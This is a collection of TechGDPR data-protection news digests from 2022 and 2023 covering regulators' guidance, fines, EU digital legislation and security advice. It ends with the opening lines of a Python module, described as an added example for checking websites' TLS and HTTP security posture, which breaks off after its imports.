https://techgdpr.com/blog/data-protection-digest-06022023-threshold-for-cookies-spy-pixels-consent-evidence-data-storage-and-deletion/
Mon, 06 Feb 2023 09:34:51 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes: threshold for cookies, advertising claims’ mediation, China’s outbound transfers

The EDPB approved a minimum threshold for the use of cookies and subsequent processing of the data collected. No cookies that require consent can be set without positive action expressed by the user, or purely on the grounds of the data controller’s legitimate interest. The absence of refusal options, visible and accessible at any time, on any layer of the banner, constitutes an infringement. The limitations, such as for strictly necessary technical cookies, must be indicated. Confusing information, designs and colours are not acceptable.

The Spanish data protection agency AEPD announced a mediation system to expedite the resolution of advertising claims, (in Spanish). It has approved the modification of the Autocontrol Code of Conduct ‘Data processing in advertising activity’, which includes out-of-court procedures to resolve individuals’ complaints more quickly. Advertisers must respond within a maximum period of 15 days, proposing the actions they deem pertinent for mediation. The maximum duration of the procedure will be 30 days.

The Cybersecurity Administration of China has published guidelines on outbound data transfers of personal and important data from China to other jurisdictions, whitecase.com reports. Organisations must comply with these guidelines by 1 March or risk administrative, civil and criminal penalties. In certain cases the measures include security assessments and approval from the state before engaging in outbound data transfers. Outbound data transfers in this case include:

  • an entity in China actively sending data to a recipient in another jurisdiction;
  • an entity in China permitting a person or entity outside China to access data generated in the course of the data processor’s operations in China;
  • multinational intragroup transfers of data; and
  • operating centralised document management systems for global operations, with servers hosted outside China. 

Official guidance: consent evidence, data storage periods and deletion, TOMs, training, recruitment data

Denmark’s privacy regulator explained the balance between consent evidence requirements and data minimisation. The data controller should be able to demonstrate that the data subject has given consent. However, the rule only applies as long as the data processing is ongoing. After the end of the processing activity, (eg, the data subject has withdrawn their consent), there is no obligation to demonstrate that evidence. Moreover, the data controller has a duty to delete personal and additional data without undue delay after consent withdrawal, (unless needed for claims to be established or defended and only for a short period of time).

The Portuguese privacy regulator CNPD published guidance on technical and organisational security measures, aimed at data controllers and processors. The CNPD lists a set of TOMs that must be considered by organisations in their risk prevention and minimisation plans, (in Portuguese). The list is dynamic and not exhaustive due to rapid technological changes and is therefore subject to updates whenever necessary. The increasing number of security incidents in the past year revealed that if organisations had been equipped with adequate security measures, the risks would have been lower and the impact on the rights of data subjects smaller. 

The GDPR states that the organisation, (controller), is obliged to limit the storage of personal data so that the data is not stored longer than is necessary to achieve its purpose. The Latvian privacy regulator DVI explains how to determine the data storage period, and what to do when it has expired. The organisation must have internal procedures in place in order to determine:

  • that the purpose has been achieved, and the data cannot be further used for any other unrelated purpose, (eg, if the deadline specified in the regulatory act has been reached, or the legal basis has been lost);
  • the frequency with which the purposes of the data processing and their justifications will be reviewed;
  • how to receive a signal that personal data has expired, and
  • how to inform data subjects of these periods, (or the criteria that were taken into account to determine them), in the privacy policy. 

In the end, data must be deleted completely, without possibility of recovery. The deletion procedures must include identifying the persons responsible, the location of the data, deletion follow-up, and informing processors, other controllers and the data subjects.

The Latvian regulator also issued a reminder of the importance of data protection training. It is necessary to familiarise employees with the framework created in the organisation for data protection and processing: cyber security, specific industry regulations, employee liabilities for violations, data breach responses, and reviewing procedures. A desired outcome would be: a customer is asked to provide their personal data for identification; if the client has questions about why this is necessary, the employee should be able to answer reasonably and indicate that more detailed information is available in the privacy policy. 

A recruitment process necessarily involves the processing of a significant amount of personal data about candidates. The rise of new technologies has multiplied recruitment channels, (social networks, personalised advertising, specialized search engines), and communication tools used (videoconferencing, chatbots, mobile applications). It has also led to the creation of databases of a large volume allowing the use of artificial intelligence or the use of tools to assess the “soft skills” of candidates. In this context, the French regulator CNIL offers a guide and a set of practical sheets, Q&As, to support recruitment stakeholders in their compliance, (in French). 

Investigations and enforcement actions: game developers, spy pixels, psychometric tests, unwanted membership, Covid-related algorithms, email security

The UK’s ICO published an Age Appropriate Design Code Audit, (AADC), of Facepunch Studios, a games developer. Facepunch does not require a user account, although some gameplay data and device information is collected in-game. Facepunch also shares some personal data of users with third parties in order to operate parts of or functions within their games or services. The audit concluded that the age assurance measures in place should be improved, by assessing and reliably determining the actual ages of current UK child users, regularly monitoring the effectiveness of the third-party age gate used, and assessing which elements of an online service are appealing to or likely to be accessed by children. Where actual user ages are not established with certainty, the AADC standards should be applied to all users. 

The Danish data protection authority criticised Vækstfonden, (Denmark’s investment fund), for using spy pixels in its newsletters. As with the processing of personal data using cookies on websites, the use of spy pixels requires a processing basis according to the GDPR. The spy pixels were used to analyse which articles the recipients clicked on in order to optimise the organisation and sending of the newsletters. But the fund had not observed the obligation to provide information regarding the processing. Vækstfonden has stated that it has changed suppliers for sending out newsletters and that the fund has updated its privacy policy. 

Spain’s AEPD fined Thomas International 40,000 euros for processing of sensitive data, Data Guidance reports. The complaint concerned a psychometric test provided by Agroxarxa, which was run by Thomas International. Though Agroxarxa stated that candidates were not required to provide sensitive personal data, the psychometric test requested it, adding that its provision was required by the HR department of Agroxarxa. Thomas International provided the same questionnaire to all clients that used its services, allowing for the processing of sensitive personal data even when not requested by the client.

In the US, the Federal Trade Commission is sending payments totaling more than 973,000 dollars to 17,064 people who lost money after NutraClick automatically enrolled them in unwanted membership programs for supplements and beauty products and misled consumers about when they had to cancel trial memberships to avoid monthly charges.

The Italian privacy authority has sanctioned three local health authorities which, through the use of algorithms, had classified patients in relation to their risk of Covid-related complications. The patients’ data had been processed in the absence of a suitable regulatory basis, without providing the interested parties with all the necessary information, (in particular on the methods and purposes of the processing), and without having previously carried out an impact assessment. 

Ireland’s privacy regulator fined a nursing home operator. The credentials of a user account at a nursing home were captured on a fake website via a phishing email. This allowed the bad actor to set up forwarding of all inbound emails to a third-party email account. Adequate technical and organisational measures could have included appropriate encryption of data being transferred over external networks, suitable phishing training, and regular testing of the safeguards. 

Meanwhile, the Swedish privacy regulator fined an insurance company for sending sensitive personal data via e-mail without sufficient protection. The email was only encrypted in transit. The encryption ended before the message had reached the final recipient and there was thus a risk that unauthorised persons could read the message in plain text after the encrypted transmission had ended.

Data security: ISO 31700 Privacy by Design, AI Risk Management Framework by NIST, taxonomy of ICT incidents, mobile data

The International Organisation for Standardisation has finally published the long-awaited ISO 31700. It establishes high-level requirements, (and use cases), for privacy by design to protect privacy throughout the lifecycle of a consumer product, including data processed by the consumer. This includes consumers’ personally identifiable information and other data processed, (collected, used, accessed, stored, and deleted), or intentionally not collected or processed by the organisation and by the digital goods and services within the digital economy. The preview document is available here.

America’s NIST published an AI Risk Management Framework. AI systems and the contexts in which they are deployed are frequently complex, making it difficult to detect and respond to failures when they occur. AI risk management can drive responsible uses and practices by prompting organisations and their internal teams who design, develop, and deploy AI to think more critically about context and potential or unexpected negative and positive impacts. Core concepts remain human centricity, social responsibility, and sustainability.

In Italy, the National Cybersecurity Agency offered a new taxonomy of incidents on ICT assets, subject to mandatory notification. After initial access, execution, installation & lateral movements, it talks about “Actions on objectives”, which refers among other things to: collecting from within the network confidential and sensitive data or detecting their presence outside the systems authorised to process them; exfiltrating data from within the network to external resources or manipulating, degrading, disrupting, or destroying systems, services, or data. 

Could your phone be leaking data that you are not aware of? asks the US NIST. It goes on to explain how control of the data may be lost due to unauthorized or unwarranted transmission of data to an external source. Mobile data leaks can also occur when mobile device privacy settings or applications are misconfigured. This includes personally identifiable information, financial and health data, video and audio files, information about the way an individual uses the Internet, and location tracking data. Thus, organisations have to:

  • Manage mobile device settings;
  • Preserve confidentiality, by employing data in transit protection;
  • Keep mobile operating system and applications up to date;
  • Apply zero trust principles;
  • Separate work from personal information, by deploying a Bring Your Own Device policy;
  • Apply app vetting to identify security and privacy risks;
  • Apply Mobile Threat Defense solutions that monitor for device-, app-, and network-based attacks.

Big Tech: the Digital Services Act’s deadline, Replika AI chatbot ban

The European Commission has published non-binding guidance to help very large online platforms and search engines within the scope of the Digital Services Act, (DSA), to comply with their requirement to report user numbers in the EU, at the latest by 17 February, and at least once every six months afterwards, (for small businesses and start-ups the information must be provided on the request of authorities). In the near future very large online platforms and search engines will be subject to additional obligations, such as making a risk assessment and taking corresponding risk mitigation measures regarding users’ rights online. 

Replika, an AI chatbot company, is not allowed to use the personal information of Italian users, according to Italy’s data protection agency, which cites risks to children and emotionally fragile individuals. The US-based start-up offers users personalised avatars that talk and listen to them. The lack of an age-verification mechanism, such as filters for minors or a blocking mechanism if users do not explicitly state their age, was one of many issues that the Italian regulator highlighted. Additionally, the processing of personal data by the company is illegal because it cannot be justified by a contract that a minor is unable to sign.

Data protection & privacy digest 27 Sept – 11 Oct 2022: New EU-US data privacy framework is now under EU legislators’ microscope
https://techgdpr.com/blog/data-protection-digest-12102022-new-eu-us-data-privacy-framework-is-now-under-eu-legislators-microscope/
Wed, 12 Oct 2022 07:48:57 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes: EU-US adequacy procedures, non-material damage in the GDPR, Colorado draft privacy law, Andorra data protection regime

On 7 October, President Biden signed an Executive Order on ‘Enhancing Safeguards for United States Signals Intelligence Activities’. Along with the Regulations issued by the Attorney General, it implements into US law the agreement in principle, (the EU-US data privacy framework), announced in March. The document introduces new binding safeguards to address all the points raised by the CJEU, limiting access to EU data by US intelligence services, enabling EU individuals to lodge a complaint with the so-called ‘Civil Liberties Protection Officer’, and to appeal under a ‘Data Protection Review Court’. In parallel, the UK and US are also looking ahead to concluding a data adequacy agreement following Biden’s order. The European Commission will now prepare a draft adequacy decision in several steps: obtaining an opinion from the EDPB, and approval from an EU Member State committee. In addition, the European Parliament has a right of scrutiny for adequacy decisions. European Commissioner for Justice Didier Reynders is sure there will be a fresh legal challenge, but he is confident that the pact meets the court’s demands. However, in the opinion of the NOYB privacy campaigners, there is no indication that US mass surveillance will change in practice.

The European Council gave final approval to protect users’ rights online – the Digital Services Act. It defines clear responsibilities and accountability for providers of intermediary services, such as social media, online marketplaces, very large online platforms, and very large online search engines. The rules are designed asymmetrically, so larger intermediary services are subject to stricter rules. Among many measures, it imposes certain limits on the use of sensitive personal data for targeted ads, including age, gender, race, and religion; it bans misleading interfaces known as ‘dark patterns’, and offers users a system for recommending content that is not based on profiling. After being published in the Official Journal of the European Union, the law will apply in fifteen months.

A CJEU Advocate General issued a non-binding opinion on non-material damage resulting from unlawful processing of data, conditions for the right to compensation, and establishing damage above a certain threshold of seriousness. The Austrian supreme court referred the above questions for clarification to the EU’s top court as the GDPR grants any person who has suffered material or non-material damage due to an infringement of its provisions the right to receive compensation from the data controller or processor. According to the opinion:

  • A mere infringement of a provision is insufficient if that infringement is not accompanied by relevant material or non-material damage for a person.
  • The compensation for non-material damage provided for in the regulation does not cover the upset that the person concerned may feel due to the infringement.
  • It is for national courts to determine when, owing to their characteristics, a subjective feeling of displeasure may be deemed, in each case, to be non-material damage. Further contextual and teleological considerations on data subjects’ powers over their data can be found in the original text.

Meanwhile, in the US, the state of Colorado published Privacy Act Draft Rules. It concentrates, among many provisions, on consumer-facing compliance, (disclosures, handling requests, and opt-out mechanisms), handling sensitive data, data minimisation and purpose limitations, data protection impact assessments, and restrictions related to profiling. The rules are not yet finalised and do not contain very strict language. The act does not go into effect until July 1, 2023, with input due from several stakeholders and a public hearing. 

Finally, Andorra approved two decrees regulating the protection of personal data and the supervisory authority. The first regulation integrates all the necessary regulatory provisions into the country’s daily life. The intention is to provide legal security to those responsible for data processing, (administrations, private entities, companies, associations, etc.). In addition, everyone has six months to adapt their processes to this new text. The second document configures the Andorran Data Protection Agency as a public body with its own legal identity, independent and with full capacity to act, along with its composition, functions, inspection capacity, penalty, and other main activities. 

Official guidance: public collections of support signatures, subject access requests, financial crimes, background checks, health data warehouses

The Slovenian data protection commissioner issued a reminder of the rules for protecting personal data in the public collection of support signatures. Organisers must ensure adequate security of personal data, (eg, against loss), and when collecting their data, also provide individuals with information on Art. 13 of the GDPR. The individual must therefore receive at least information about the controller, (who collects personal data), the purpose and legal basis for collecting personal data, their rights, and legal protection. Even if the collection of personal data is determined by law, (eg, in referendums), the signature collector must still provide information about the processing of personal data at the moment the data is obtained.

The UK data regulator, the ICO, has laid out the basics of data subject access requests. Everyone has the right to ask an organisation whether or not it is using or storing their personal information. You can also ask for copies of your personal information, verbally or in writing. The ICO deals with over 35,000 complaints from individuals every year, the vast majority of which are to do with the rules and obligations around accessing personal data: information rights requests taking too long, no one to contact, questions not being answered, incomplete or unsatisfactory responses, lack of trust in what people are being told, or lack of understanding leading to information being perceived as unclear or unhelpful. Thus the main rules for organisations to get access requests right are:

  • Find out what your customer wants exactly, and ask them to provide additional details – such as the context in which information may have been processed and likely dates when processing occurred – to help you locate the requested information.
  • If you cannot meet the deadline for individual rights requests, tell them.
  • If you’re dealing with a complex or particularly large request, explain that you’ll send out information in batches and provide a timeframe for this.
  • Explain exemptions, and redactions, if they apply.
  • Keep a record of your decision so that you can share it with the supervisory authority.
  • Explain legal provisions that someone will understand.
  • Keep your privacy policy up to date and ensure it’s accessible and easy to understand.

The EDPS reminded organisations of the meaning of the US CLOUD Act, which may conflict with the GDPR. The federal law that came into force in 2018 allows the US government, with a court order, to access electronically stored communication data held by a private entity subject to US law, (eg, through a direct or indirect corporate link), but located overseas, provided that the data is relevant to an ongoing criminal investigation. As a result, the EDPS reconfirms the importance of seeking alternative services, such as cloud and web services based in the EU, to ensure that personal data is processed according to EU law.

Sweden’s privacy regulator IMY has allowed a bank to handle personal data relating to violations of the law in cases of money laundering and the financing of terrorism when there is no legal support for the processing. Such control may be necessary for a bank to prevent a customer whose customer relationship has been terminated in one branch from being able to turn to another one within the group. Private companies must apply for permission from IMY for such processing to be allowed. Similarly, the IMY gives companies that offer background checks permission to handle personal data related to legal violations in some instances, (eg, fraud and economic crime, tax crimes and embezzlement crimes, criminal violations of individual job seekers and consultants, and persons with senior positions or controlling influence in the business).

The French regulator CNIL published a “checklist” of compliance, (in French), for health data warehouses. It can be used by anyone wishing to set up a data warehouse in the health field. It goes through the various requirements in the form of statements that data controllers judge to be true, false, or not applicable. Any processing that does not comply with all the requirements defined by the reference framework must be the subject of specific authorisation from the CNIL before being implemented, (by using “declare a file” on the CNIL website). An action plan to bridge any gaps between the envisaged processing and the requirements of the reference framework can thus be drawn up on this basis. 

Investigations and enforcement actions: one-stop-shop complaints, unlawfully communicated e-mail addresses and health data, predatory direct marketing, unreported data breach, and ethical hacking

The Irish data protection commission, (DPC), issued a report providing a detailed fact-based overview and statistical analysis of its handling of One-Stop-Shop complaints in the period May 2018 to end of 2021. The DPC has received almost 20,000 complaints since the GDPR came into force, and over 17,000 have been concluded. The report illustrates that:

  • 1,278 valid cross-border complaints were received by the DPC: 85% as lead supervisory authority, (LSA), and 15% as a concerned supervisory authority, (CSA).
  • The DPC handles 62% of cross-border complaints as the LSA, originally lodged with another supervisory authority and transferred to the DPC.
  • 73% of all cross-border complaints handled by the DPC as the LSA have been concluded.
  • Most cross-border complaints handled by the DPC as the LSA were resolved through amicable resolution in the complainant’s favour.
  • 87% of all cross-border complaints handled by the DPC as the LSA relate to just 10 data controllers.
  • 48% of complaints transferred by the DPC to other EU/EEA LSAs, (excluding the UK), have been concluded.

The Hungarian data protection authority NAIH issued a fine to the National Health Insurance Fund management after receiving an individual complaint. The fund’s website vaksinareg.neak.gov.hu had “published” the information that the complainant had registered for their Covid-19 vaccination. Anyone knowing their social security number and date of birth could confirm the validity of the registration of the person concerned. In this context, the complainant contested why the fund did not, for example, send the query result only to the e-mail address. The fund management also failed to respond to the subject access request, (when and from which IP address the query was made), as well as to its cooperation obligations during the regulator’s inspection. 

Meanwhile the Italian privacy regulator ‘Garante’ fined a US company, (Senseonics), 45,000 euros for violations of personal data in the use of its glucose monitoring system and for having unlawfully communicated e-mail addresses and health data of about 2000 Italian diabetic patients. The company notified the SA of a data breach due to an employee’s sending – as part of an information campaign – email messages with the recipients’ addresses in the ‘Cc’ field rather than in the ‘Bcc’ one. This enabled every recipient to view the other recipients’ email addresses. The messages contained ‘data disclosing health’; accordingly, they could only be disclosed to third parties based on the data subjects’ written authorisation or on other appropriate legal grounds. The inquiries by ‘Garante’ shed light on additional infringements caused by the glucose monitoring system being offered. After downloading the app, users were expected to accept, with a single click, the terms of use of the service jointly with the contents of the privacy policy. This prevented them from giving their consent separately to the individual processing operations including the processing of health-related data.

The UK’s ICO has fined Easylife Ltd 1,350,000 pounds for using the personal information of 145,400 customers to predict their medical condition and target them with health-related products without their consent. The company was also fined 130,000 pounds for making 1,345,732 predatory direct marketing calls. The ICO investigation found that when a customer purchased a product from Easylife’s Health Club catalog, the company would make assumptions about their medical condition and then market health-related products without their consent. If a person bought a jar opener or a dinner tray, Easylife would use that purchase data to assume that person has arthritis and then call the individual to market glucosamine joint patches.

The Spanish data protection authority AEPD decided to sanction BAYARD REVISTAS for insufficient risk analysis, insufficient technical and organisational measures, and failure to notify a data breach, after receiving a complaint. The complaining party informed the agency that they had received an email from the person in charge of the web portal, informing them of unauthorised access to the database, (BAYARD being responsible), by an unauthorised third party. According to the email, the location and contact data of the people who had provided their information on the website through the registration form were involved. The attack reportedly had not been carried out for malicious purposes, but with the intention of ethical hacking. The number of affected people matched the total number of users of the web portal, around 464,762. After the incident, the person in charge claimed to have fixed all the vulnerabilities that made the attack possible, to have implemented the protocols to follow in the event of an incident related to data protection, and to have adopted a series of measures, including the encryption of the stored information. 

Data security: online accounts protection, “think before you click”

The UK National Cyber Security Centre, (NCSC), published tailored advice to support online retailers, hospitality providers, and utility services to protect themselves and their customers from cybercriminals. The guidance encourages organisations to add an extra layer of security on top of passwords to authenticate customers. Organisations are also advised what steps to take if their brand has been spoofed online. Buyer authentication methods and malicious websites takedown guidance are the latest additions to the advice package. The NCSC encourages the public and small businesses to adopt six behaviours to protect their online accounts and devices:

  • Use a strong and separate password for your email
  • Create strong passwords using 3 random words
  • Save your passwords in your browser
  • Turn on two-step verification
  • Update your devices and apps
  • Back up your data

“Think before you click” (#ThinkB4UClick). This is the message during the EU’s information security month, which falls in October every year. The Swedish data protection authority IMY repeats some tips for businesses on how they can protect their most important information. Reasonable security imposes costs, in time, money, and resources. It requires long-term and persistent work and ongoing prioritisation. Good security – whether it’s data and privacy protection, information security, or cyber security – is a central issue for top management. It usually requires collaboration between many roles and competencies:

  • Establish systematic security work – security testing.
  • Backup – a working backup can be your only salvation if the worst happens!
  • Use anti-malware software.
  • Keep systems and software in all equipment up to date, to reduce the risk of vulnerabilities being exploited.
  • Train the staff – on an ongoing basis – to maintain a high awareness of the risks.

Big Tech: Meta Ireland inquiry, Facebook and Google settlements, Equifax and Experian data practices, Uber’s former chief security officer’s criminal obstruction, Optus breach outcomes

The Irish data protection commission has submitted a draft decision in a large-scale inquiry into Meta Platforms Ireland Limited to other concerned EU supervisory authorities. An inquiry was opened in 2021 after media reports highlighted that a collated dataset of Facebook user personal data, approx. 533 million Facebook users worldwide, had been made available on the internet. The inquiry concerned the question of Meta’s compliance with its obligations under Art. 25 of the GDPR, (“data protection by design and by default”). Other concerned supervisory authorities have one month to review the draft decision.

Following a significant data breach at Optus, the nation’s second-largest mobile operator, Australia recommended a change of consumer privacy legislation to aid targeted data sharing between telecommunications companies and banks. With the new rules, telcos will be able to provide banks with government-issued identity cards so that banks may adopt improved monitoring for clients affected by data breaches. Through already-in-place industry reporting systems, such as fraud information exchanges, the proposed reforms will also enable enhanced fraud detection in the more significant financial services sector. Banks are supposed to erase the information they get when they no longer need it. They are only permitted to use it to prevent or address cybersecurity problems, fraud, scams, or identity theft. 

In a letter to the FTC that Reuters reviewed, the European Commission was encouraged to look into how data brokers like Equifax and Experian had accumulated payroll details about most Americans. To assist lenders, landlords, and hiring managers with background checks on potential candidates, businesses like Equifax have been acquiring employee employment histories and salary data from employers for decades. However, privacy campaigners claim that these sizable databases are prone to fraud and inaccuracy and that sometimes employees are shocked to learn that their information is included. According to Equifax, it abides by all legal requirements and encourages new voices in the sector.

Uber’s former chief security officer, Joe Sullivan, was found guilty of criminal obstruction for failing to report a 2016 cybersecurity incident to authorities. According to the Guardian, the case was being watched as an important precedent regarding the culpability of individual security staffers and executives when handling cybersecurity incidents. In 2018, Uber paid 148 million dollars to settle claims by all 50 US states and Washington DC that it was too slow to disclose the hacking. The case affected the data of 57 million passengers and drivers.

Finally, Meta and Google recently settled a couple of significant privacy actions in the US:

  • Illinois residents involved in a class-action lawsuit against Google will receive 154 dollars each as part of a 100 million dollar settlement. The class of roughly 420,000 people who brought the lawsuit argued Google Photos’ face grouping tool violated the state Biometric Information Privacy Act.
  • Facebook parent Meta has settled a lawsuit against two companies that had engaged in data scraping operations, which had seen them gathering data from Facebook and Instagram users for marketing intelligence purposes. 
  • Arizona’s Attorney General announced an 85 million dollar settlement with Google related to alleged user tracking via location data from smartphones despite users disabling the tracking settings.

Weekly digest 4 – 10 July 2022: DSA and DMA adopted, setting standards on EU digital service providers
https://techgdpr.com/blog/weekly-digest-11072022-dsa-and-dma-adopted-setting-clear-standards-on-eu-digital-service-providers/
Mon, 11 Jul 2022 12:13:25 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes: DSA and DMA, China’s data exporters, ransom payments, CASPs

Last week, the European Parliament adopted the new Digital Services Act (DSA) and Digital Markets Act (DMA), following a deal reached between Parliament and Council. The two bills aim to address the societal and economic effects of the tech industry by setting clear standards for how tech companies operate and provide services in the EU, in line with the EU’s fundamental rights and values. The DSA sets clear obligations for digital service providers, such as social media or marketplaces, to tackle the spread of illegal content, online disinformation and other societal risks. These requirements are proportionate to the size of the platforms and the risks they pose to society. The new obligations include:

  • New measures to counter illegal content online and obligations for platforms to react quickly, while respecting fundamental rights, including the freedom of expression and data protection.
  • Strengthened traceability and checks on traders in online marketplaces to ensure products and services are safe, including efforts to perform random checks on whether illegal content resurfaces.
  • Increased transparency and accountability of platforms, for example by providing clear information on content moderation or the use of algorithms for recommending content, (so-called recommender systems); users will be able to challenge content moderation decisions.
  • Bans on misleading practices and certain types of targeted advertising, such as those targeting children and ads based on sensitive data. So-called “dark patterns” and misleading practices aimed at manipulating users’ choices will also be prohibited.
  • Very large online platforms and search engines, (with 45 million or more monthly users), which present the highest risk, will have to comply with stricter obligations, enforced by the Commission, (preventing systemic risks, independent audits). They will also have to facilitate access to their data and algorithms to authorities and vetted researchers.

At the same time, the DMA sets obligations for large online platforms acting as “gatekeepers”, (platforms whose dominant online position makes them hard for consumers to avoid), on the digital market to ensure a fairer business environment and more services for consumers. To prevent unfair business practices, those designated as gatekeepers will have to:

  • allow third parties to inter-operate with their own services, meaning that smaller platforms will be able to request that dominant messaging platforms enable their users to exchange messages, send voice messages or files across messaging apps. This will give users greater choice and avoid the so-called “lock-in” effect where they are restricted to one app or platform;
  • allow business users to access the data they generate in the gatekeeper’s platform, to promote their own offers and conclude contracts with their customers outside the gatekeeper’s platforms.

Gatekeepers can no longer:

  • Rank their own services or products more favourably, (self-preferencing), than other third parties on their platforms;
  • Prevent users from easily un-installing any pre-loaded software or apps, or using third-party applications and app stores;
  • Process users’ personal data for targeted advertising, unless consent is explicitly granted.

Once formally adopted by the Council in July, (DMA), and September, (DSA), both acts will be published in the EU Official Journal and enter into force twenty days after publication. Their application will start through 2023-2024. 

Meanwhile, China’s cyberspace regulator, (CAC), clarified that rules requiring data exports to undergo security reviews would be effective from Sept. 1, the first time it has given a start date for a new regulatory framework that will affect hundreds, if not thousands, of Chinese companies, Reuters reports. The measures, according to Data Guidance’s report, provide the cases in which a data exporter must submit a data exit security assessment to the CAC through the provincial cybersecurity and informatisation department where:

  • the data processor provides important data overseas;
  • the data processor is a critical information infrastructure operator and the data processor processes the personal information of more than 1 million people;
  • the data processor processes the personal information of 100,000 people or the sensitive information of 10,000 people since 1 January of the previous year; or
  • other situations required to declare data export security assessments as provided by the CAC.

The data export security assessment combines prior assessment with continuous supervision, and risk self-assessment with security assessment. In addition, the measures outline that a data processor’s pre-assessment should focus on, among other things, the responsibilities and obligations that overseas recipients are subject to, the risk of data being tampered with, destroyed, or leaked, and whether data export related contracts fully stipulate the responsibilities and obligations of data security protection. The full legal text, (in Chinese), is available here.

The UK National Cyber Security Centre, (NCSC), and Information Commissioner’s Office, (ICO), say it is incorrect for organisations to assume that paying a ransom is a) the right thing to do, so that they need not engage with the ICO as a regulator, or b) something that will earn them reduced enforcement. Thus both organisations, in a joint statement, advise solicitors not to advise clients to pay ransomware demands should they fall victim to a cyber-attack. Paying ransoms to release locked data does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered a reasonable step to safeguard data.

The European Parliament and Council negotiators also reached a provisional deal on a new bill aiming to ensure that crypto transfers, (like bitcoins and electronic money tokens), can always be traced and suspicious transactions blocked. The legislation is part of the new EU anti-money laundering package and will be aligned with the Markets in Crypto-assets rules, (MiCA). The agreement extends the so-called “travel rule”, already existing in traditional finance, to cover transfers in crypto assets. This rule requires that: 

  • Information on the source of the asset and its beneficiary travels with the transaction and is stored on both sides of the transfer. 
  • Crypto-assets service providers, (CASPs), will be obliged to provide this information to competent authorities if an investigation is conducted into money laundering and terrorist financing.
  • There are no minimum thresholds nor exemptions for low-value transfers, as originally proposed. Regarding protecting personal data, including a name and an address required by the travel rule, negotiators agreed that if there is no guarantee that privacy is upheld by the receiving end, such data should not be sent.
  • Before making the crypto-assets available to beneficiaries, providers will have to verify that the source of the asset is not subject to restrictive measures or sanctions, and there are no risks of money laundering or terrorism financing.

The rules would also cover transactions from so-called un-hosted wallets, (a crypto-asset wallet address that is in the custody of a private user), when they interact with hosted wallets managed by CASPs. In case a customer sends or receives more than 1000 euros to or from their own un-hosted wallet, the CASP will need to verify whether the un-hosted wallet is effectively owned or controlled by this customer. The rules do not apply to person-to-person transfers conducted without a provider, such as bitcoin trading platforms, or among providers acting on their own behalf.

Official guidance: employees’ location, insurance applications, local authorities, commercial interest vs. consent

The Finnish data protection ombudsman asked service providers in the public sector for a report on use of the location data function in computers used by employees in the municipal sector. The background for the report was a notification of a data security breach filed by a hospital district, when settings that allowed the collection of location data were switched on in employees’ Windows 10 workstations and remote work laptops, although there was no intention to collect the data. As a result, the regulator found that:

  • The hospital district did not have a need required by law for processing employees’ location data.
  • The hospital district did not appropriately review what data it intended to collect. 
  • Since the employees’ location data were unnecessary for the employer and collected unintentionally, these data should not have been processed. In order to ensure data protection by default, the hospital district should have reviewed the basic settings of the system and noticed that the location function was switched on before deploying the workstations. 
  • Since the location function was switched on, employees’ personal data were delivered to Microsoft as well.

The regulator ordered the erasure of any historical data, location logs and other personal data created during use of the location data function. 

The Finnish ombudsman has also investigated the procedures of insurance companies when they request the health information of insurance applicants and insured persons from health care providers in order to determine the insurance company’s liability. Deficiencies were found, especially in the appropriate demarcation of the information requested from the health care provider and in the legality of processing. The insurance companies justified the processing of the policy applicant’s health data on the grounds of a provision of the data protection law, according to which the insurance institution can process a client’s or claimant’s health data that is necessary to determine the liability of the insurance institution.

The regulator states that the provision of the data protection law in question only applies to the processing of the data of the insured and the claimant. Insurance companies cannot process the insurance applicant’s health information or request personal information from the health care provider during the insurance application phase, based on the regulations, because the contract has not yet been concluded. It is possible to process health data under certain conditions if the person has given valid consent. However, it requires that the person is told precisely what information is collected about them and for what purposes it is used. Asking for consent in a general way without detailing the information and purposes of use therefore does not meet the requirements of the data protection regulation.

The French data protection regulator CNIL published a guide on the obligations and responsibilities of local authorities with regard to data protection. The study was conducted at the end of 2021. Focusing on communities smaller than 3,500 inhabitants, which represent 91% of municipalities in France, this study aimed to understand digital usage, identify risks/obstacles and data needs. It appeared that the majority of respondents are not aware of the legal framework in force, with the exception of the GDPR. The provisions relating to competences and responsibilities in the field of digital security are little or not known to local elected officials and territorial agents, who consider cybersecurity regulations to be particularly complex.

The purpose of this guide is to inform local elected officials and territorial agents about the obligations related to: a) the protection of personal data; b) the implementation of local teleservices; c) hosting of health data. This guide also recalls the different types of legal liability to which local authorities and their public institutions are exposed in the event of cyberattacks and damage related to: administrative responsibility, civil liability, criminal liability.

The European Commission says that the Dutch data protection authority AP is hindering free enterprise in the EU by interpreting privacy legislation too strictly. The legal battle refers to the dispute between the AP and streaming service VoetbalTV. The service broadcasted video images of amateur matches via the internet for, among others, players, trainers and fans. More than 150 clubs used it, until the AP imposed a fine of 575,000 euros on the service in 2019. VoetbalTV then went bankrupt.

According to the AP, the profit motive of the company could never constitute a ‘legitimate interest’ for the broadcasting of the images without the individual consent of players and the public. According to Brussels, the Dutch supervisory authority did not strike the right balance between the right to data protection on the one hand and the freedom of undertaking on the other. Additionally, in 2020, a Dutch court reportedly ruled that VoetbalTV did not have to pay the fine, as personal data may sometimes also be processed when there is only a commercial interest. The AP had appealed against this decision.

Investigations and enforcement actions: website security, data protection requests, employment certificate, cookies, account deletion, health data

As part of one of its priority themes, “the cybersecurity of the French web”, the CNIL has carried out a series of online checks of twenty-one websites of French public sector bodies, (municipalities, university hospitals, ministries, etc.), and the private sector, (e-commerce platforms, IT solution providers, etc.). The verifications carried out by the CNIL therefore focused mainly on technical and organisational flaws: 

  • unsecured (HTTP) access to websites; many actors also implemented obsolete versions of the TLS protocol to secure data in transit, and used non-compliant certificates and cryptographic suites for exchanges with the servers of the audited sites;
  • lack of mechanisms to log and trace abnormal connections to servers;
  • use of insufficiently robust passwords, and password renewal procedures that do not adequately secure their transmission and storage.

The bodies on notice have a period of three months to take any measure to ensure an appropriate level of security.
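The three classes of flaw the CNIL reports above (clear-text access, obsolete TLS versions, non-compliant certificates and cipher suites) are the kind of thing a scanner can evaluate mechanically. The following Python is an added example, not CNIL's or the original post's code: it assesses constructed scan records, with hypothetical host names, against those classes and reports a finding per flaw.

```python
"""Transport-security posture check for a set of audited websites.

Added example. The scan records are constructed by hand to mimic what a
TLS scanner reports; thresholds follow the three classes of flaw the CNIL
described (clear-text HTTP access, obsolete TLS versions, non-compliant
certificates and cipher suites). Host names are hypothetical.
"""
from dataclasses import dataclass
from datetime import date
from typing import Dict, List

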